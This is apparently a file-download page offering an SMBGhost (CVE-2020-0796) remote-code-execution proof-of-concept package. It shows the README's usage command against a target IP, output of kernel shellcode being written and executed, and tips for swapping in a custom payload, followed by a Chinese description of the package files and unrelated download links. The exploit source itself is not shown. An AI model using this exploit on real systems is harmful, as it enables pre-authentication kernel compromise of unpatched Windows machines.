# SMBGhost_RCE_PoC
RCE PoC for CVE-2020-0796 "SMBGhost"
For demonstration purposes only! Only use this a reference. Seriously. This has not been tested outside of my lab environment. It was written quickly and needs some work to be more reliable. Sometimes you BSOD. Using this for any purpose other than self education is an extremely bad idea. Your computer will burst in flames. Puppies will die.
Now that that's out of the way....
Usage ex:
```
$SMBGhost_RCE_PoC python exploit.py -ip 192.168.142.131
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff79480000000
[+] ntoskrnl entry at fffff80645792010
[+] found PML4 self-ref entry 1eb
[+] found HalpInterruptController at fffff79480001478
[+] found HalpApicRequestInterrupt at fffff80645cb3bb0
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at fffff5fbc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000a00!
[+] Press a key to execute shellcode!
[+] overwrote HalpInterruptController pointer, should have execution shortly...
```
Replace payload in USER_PAYLOAD in exploit.py. Max of 600 bytes. If you want more, modify the kernel shell code yourself.
lznt1 code from [here](https://github.com/you0708/lznt1). Modified to add a "bad compression" function to corrupt SRVNET buffer
header without causing a crash.
See this excellent write up by Ricera Security for more details on the methods I used:
https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html
永恒之黑使用的资源包SMB
需积分: 0 38 浏览量
更新于2024-12-04
收藏 19KB ZIP 举报
永恒之黑使用的资源包SMB是一组专门设计用于网络安全领域的工具集,涵盖了从底层汇编代码到高级Python脚本的多种文件类型。在网络安全领域中,资源包中的工具可以被安全专家或黑客用于模拟攻击,从而检测系统的安全漏洞,或者用于开发新的攻击技术。
kernel_shellcode.asm文件表明这是一个汇编语言编写的内核级shellcode文件。在网络安全中,shellcode通常指的是一段执行特定功能的代码,例如在漏洞利用过程中打开一个后门或获取系统权限。内核级shellcode往往用于直接与操作系统的内核交互,执行更为复杂和危险的操作。
.gitignore文件则是用来指定不希望被git版本控制系统跟踪的文件和目录,这在编写代码时可以保护敏感信息不被上传至代码仓库。这在安全研究中尤为重要,因为开发者往往需要隐藏那些可能被用于攻击的代码细节,或者隐藏那些可能暴露安全测试环境的配置文件。
README.md文件是文档说明文件,通常用来为项目或资源包提供概览和使用说明。在安全资源包中,README文件可能会包含资源的安装指南、功能描述、使用案例以及注意事项,这些都是使用资源包前需要了解的重要信息。
exploit.py是一个用Python语言编写的漏洞利用脚本。Python由于其简洁和易读性,在编写漏洞利用脚本方面非常流行。这样的脚本可能会利用网络服务中的特定漏洞来执行代码,或者操纵数据以便在目标系统中触发特定的行为。
smb_win.py很可能是一个与SMB(Server Message Block)协议相关的Python脚本,SMB是一种网络文件共享协议,广泛用于Windows系统中。脚本可能用于自动化某些与SMB相关的安全测试任务,如扫描可利用的服务、测试认证漏洞或尝试执行远程代码。
lznt1.py是另一个Python脚本,看起来是与LZNT1压缩算法相关的。LZNT1是Windows操作系统中的一个压缩算法,可能在资源包中用于处理压缩数据,或者用于在安全测试中解压或分析特定文件。
__pycache__目录是Python编译的字节码缓存目录,通常包含了以.pyc结尾的字节码文件,这些是Python源代码文件编译后的产物。这个目录通常不包含在版本控制系统中,因为字节码文件可以从源代码重新生成。
永恒之黑使用的资源包SMB为网络安全工作者提供了一系列的工具,这些工具覆盖了从底层汇编到高级脚本的多个层面。它们可以用于安全研究、漏洞评估、攻击模拟和安全漏洞的修复。这些资源在合法的网络安全测试中十分有用,但同时也需要在法律和道德的框架内谨慎使用,避免造成实际的安全风险。

白昼爹
- 粉丝: 6
最新资源
- 【微信小程序源码】仿找事吧.zip
- 【微信小程序源码】仿网易云音乐.zip
- 【微信小程序源码】仿微信DEMO.zip
- 【微信小程序源码】仿知乎.zip
- 【微信小程序源码】仿知乎日报.zip
- 【微信小程序源码】仿知乎日报客户端.zip
- 【微信小程序源码】仿中国当代艺术社交平台artand.zip
- 【微信小程序源码】飞机大战.zip
- 【微信小程序源码】分答小程序.zip
- 【微信小程序源码】服装供销商城小程序.zip
- 【微信小程序源码】富文本解析,折线图,MD5,bluebird.zip
- 【微信小程序源码】疯狂吃月饼(node+mysql).zip
- 【微信小程序源码】高端城市好天气.zip
- 【微信小程序源码】构架师技能图谱.zip
- 【微信小程序源码】高的地图实时天气.zip
- 【微信小程序源码】高仿苹果计算器.zip